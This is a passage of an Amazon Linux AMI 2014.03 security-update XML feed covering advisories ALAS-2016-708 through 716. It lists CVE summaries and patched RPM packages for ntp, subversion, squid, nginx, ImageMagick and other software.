name="php55-soap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.36-1.115.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-708</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-708: medium priority package update for ntp</title><issued date="2016-06-02 18:06:00" /><updated date="2016-06-03 19:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2518:
An out-of-bounds access flaw was found in the way ntpd processed certain packets. An authenticated attacker could use a crafted packet to create a peer association with hmode of 7 and larger, which could potentially (although highly unlikely) cause ntpd to crash.
1331468:
CVE-2016-2518 ntp: out-of-bounds references on crafted packet
CVE-2016-2516:
1331466:
CVE-2016-2516 ntp: assertion failure in ntpd on duplicate IPs on unconfig directives
CVE-2016-1550:
A flaw was found in the way NTP&#039;s libntp performed message authentication. An attacker able to observe the timing of the comparison function used in packet authentication could potentially use this flaw to recover the message digest.
1331464:
CVE-2016-1550 ntp: libntp message digest disclosure
CVE-2016-1548:
It was found that an ntpd client could be forced to change from basic client/server mode to the interleaved symmetric mode. A remote attacker could use a spoofed packet that, when processed by an ntpd client, would cause that client to reject all future legitimate server responses, effectively disabling time synchronization on that client.
1331462:
CVE-2016-1548 ntp: ntpd switching to interleaved mode with spoofed packets
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548" title="" id="CVE-2016-1548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550" title="" id="CVE-2016-1550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516" title="" id="CVE-2016-2516" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518" title="" id="CVE-2016-2518" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-doc" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-40.30.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-40.30.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-40.30.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-40.30.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-40.30.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-40.30.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-40.30.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-40.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-709</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-709: medium priority package update for subversion</title><issued date="2016-06-02 18:08:00" /><updated date="2016-06-03 19:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2168:
The req_check_access function in the mod_authz_svn module in the httpd server in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a crafted header in a (1) MOVE or (2) COPY request, involving an authorization check.
1331683:
CVE-2016-2168 subversion: DoS in mod_authz_svn during COPY/MOVE authorization check
CVE-2016-2167:
The canonicalize_username function in svnserve/cyrus_auth.c in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4, when Cyrus SASL authentication is used, allows remote attackers to authenticate and bypass intended access restrictions via a realm string that is a prefix of an expected repository realm string.
1331686:
CVE-2016-2167 subversion: svnserve/sasl may authenticate users using the wrong realm
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2167" title="" id="CVE-2016-2167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2168" title="" id="CVE-2016-2168" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-python27" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.9.4-2.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-710</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-710: medium priority package update for mod_dav_svn</title><issued date="2016-06-02 18:09:00" /><updated date="2016-06-03 19:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2168:
The req_check_access function in the mod_authz_svn module in the httpd server in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a crafted header in a (1) MOVE or (2) COPY request, involving an authorization check.
1331683:
CVE-2016-2168 subversion: DoS in mod_authz_svn during COPY/MOVE authorization check
CVE-2016-2167:
The canonicalize_username function in svnserve/cyrus_auth.c in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4, when Cyrus SASL authentication is used, allows remote attackers to authenticate and bypass intended access restrictions via a realm string that is a prefix of an expected repository realm string.
1331686:
CVE-2016-2167 subversion: svnserve/sasl may authenticate users using the wrong realm
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2167" title="" id="CVE-2016-2167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2168" title="" id="CVE-2016-2168" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_dav_svn" version="1.9.4" release="2.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.9.4-2.52.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.9.4" release="2.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.9.4-2.52.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.9.4" release="2.52.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.9.4-2.52.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.9.4" release="2.52.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.9.4-2.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-711</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-711: medium priority package update for cacti</title><issued date="2016-06-02 18:14:00" /><updated date="2016-06-03 20:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3659:
SQL injection vulnerability in graph_view.php
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3659" title="" id="CVE-2016-3659" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="0.8.8h" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.8h-1.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-712</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-712: medium priority package update for libksba</title><issued date="2016-06-02 18:19:00" /><updated date="2016-06-03 19:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4579:
1335396:
CVE-2016-4579 libksba: Out-of-bounds read in _ksba_ber_parse_tl
CVE-2016-4574:
1334831:
CVE-2016-4574 libksba: Incomplete fix for CVE-2016-4356
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4574" title="" id="CVE-2016-4574" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4579" title="" id="CVE-2016-4579" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libksba-devel" version="1.3.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-devel-1.3.4-1.8.amzn1.x86_64.rpm</filename></package><package name="libksba-debuginfo" version="1.3.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-debuginfo-1.3.4-1.8.amzn1.x86_64.rpm</filename></package><package name="libksba" version="1.3.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-1.3.4-1.8.amzn1.x86_64.rpm</filename></package><package name="libksba" version="1.3.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-1.3.4-1.8.amzn1.i686.rpm</filename></package><package name="libksba-devel" version="1.3.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-devel-1.3.4-1.8.amzn1.i686.rpm</filename></package><package name="libksba-debuginfo" version="1.3.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-debuginfo-1.3.4-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-713</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-713: medium priority package update for squid</title><issued date="2016-06-15 13:30:00" /><updated date="2016-06-15 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4556:
* An incorrect reference counting flaw was found in the way Squid processes ESI responses. If Squid is configured as reverse-proxy, for TLS/HTTPS interception, an attacker controlling a server accessed by Squid, could crash the squid worker, causing a Denial of Service attack.
CVE-2016-4554:
* An input validation flaw was found in Squid's mime_get_header_field() function, which is used to search for headers within HTTP requests. An attacker could send an HTTP request from the client side with specially crafted header Host header that bypasses same-origin security protections, causing Squid operating as interception or reverse-proxy to contact the wrong origin server. It could also be used for cache poisoning for client not following RFC 7230.
CVE-2016-4054:
* Buffer overflow and input validation flaws were found in the way Squid processed ESI responses. If Squid was used as a reverse proxy, or for TLS/HTTPS interception, a remote attacker able to control ESI components on an HTTP server could use these flaws to crash Squid, disclose parts of the stack memory, or possibly execute arbitrary code as the user running Squid.
CVE-2016-4053:
* Buffer overflow and input validation flaws were found in the way Squid processed ESI responses. If Squid was used as a reverse proxy, or for TLS/HTTPS interception, a remote attacker able to control ESI components on an HTTP server could use these flaws to crash Squid, disclose parts of the stack memory, or possibly execute arbitrary code as the user running Squid.
CVE-2016-4052:
* Buffer overflow and input validation flaws were found in the way Squid processed ESI responses. If Squid was used as a reverse proxy, or for TLS/HTTPS interception, a remote attacker able to control ESI components on an HTTP server could use these flaws to crash Squid, disclose parts of the stack memory, or possibly execute arbitrary code as the user running Squid.
CVE-2016-4051:
* A buffer overflow flaw was found in the way the Squid cachemgr.cgi utility processed remotely relayed Squid input. When the CGI interface utility is used, a remote attacker could possibly use this flaw to execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4051" title="" id="CVE-2016-4051" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4052" title="" id="CVE-2016-4052" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4053" title="" id="CVE-2016-4053" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4054" title="" id="CVE-2016-4054" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4554" title="" id="CVE-2016-4554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4556" title="" id="CVE-2016-4556" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2016:1138.html" title="" id="RHSA-2016:1138" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.1.23" release="16.21.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.1.23-16.21.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.1.23" release="16.21.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.1.23-16.21.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.23" release="16.21.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.1.23-16.21.amzn1.i686.rpm</filename></package><package name="squid" version="3.1.23" release="16.21.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.1.23-16.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-714</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-714: low priority package update for mod24_nss</title><issued date="2016-06-15 13:30:00" /><updated date="2016-06-15 13:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3099:
1319052:
CVE-2016-3099 mod_nss: Invalid handling of +CIPHER operator
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3099" title="" id="CVE-2016-3099" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_nss-debuginfo" version="1.0.12" release="4.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-debuginfo-1.0.12-4.22.amzn1.x86_64.rpm</filename></package><package name="mod24_nss" version="1.0.12" release="4.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-1.0.12-4.22.amzn1.x86_64.rpm</filename></package><package name="mod24_nss" version="1.0.12" release="4.22.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-1.0.12-4.22.amzn1.i686.rpm</filename></package><package name="mod24_nss-debuginfo" version="1.0.12" release="4.22.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-debuginfo-1.0.12-4.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-715</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-715: medium priority package update for nginx</title><issued date="2016-06-15 13:30:00" /><updated date="2016-06-15 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4450:
A problem was identified in nginx code responsible for saving client request body to a temporary file. A specially crafted request might result in worker process crash due to a NULL pointer dereference while writing client request body to a temporary file.
1341462:
CVE-2016-4450 nginx: NULL pointer dereference while writing client request body
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4450" title="" id="CVE-2016-4450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx" version="1.8.1" release="3.27.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.8.1-3.27.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.8.1" release="3.27.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.8.1-3.27.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.8.1" release="3.27.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.8.1-3.27.amzn1.i686.rpm</filename></package><package name="nginx" version="1.8.1" release="3.27.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.8.1-3.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-716</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-716: important priority package update for ImageMagick</title><issued date="2016-06-22 15:00:00" /><updated date="2016-06-22 15:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5240:
1333417:
CVE-2016-5240 ImageMagick: SVG converting issue resulting in DoS
CVE-2016-5239:
It was discovered that ImageMagick did not properly sanitize certain input before passing it to the gnuplot delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.
1334188:
CVE-2016-5239 ImageMagick,GraphicsMagick: Gnuplot delegate vulnerability allowing command injection
CVE-2016-5118:
It was discovered that ImageMagick did not properly sanitize certain input before using it to invoke processes. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.
1340814:
CVE-2016-5118 ImageMagick: Remote code execution via filename
CVE-2015-8898:
1344264:
CVE-2015-8898 ImageMagick: Prevent NULL pointer access in magick/constitute.c
CVE-2015-8897:
1344271:
CVE-2015-8897 ImageMagick: Crash due to out of bounds error in SpliceImage
CVE-2015-8896:
1269562:
CVE-2015-8896 ImageMagick: Integer truncation vulnerability in coders/pict.c
CVE-2015-8895:
1269553:
CVE-2015-8895 ImageMagick: Integer and buffer overflow in coders/icon.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8895" title="" id="CVE-2015-8895" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8896" title="" id="CVE-2015-8896" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8897" title="" id="CVE-2015-8897" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8898" title="" id="CVE-2015-8898" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5118" title="" id="CVE-2016-5118" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5239" title="" id="CVE-2016-5239" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5240" title="" id="CVE-2016-5240" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-perl" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.7.8.9-15.21.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="15.21.amzn1" epoch="0" 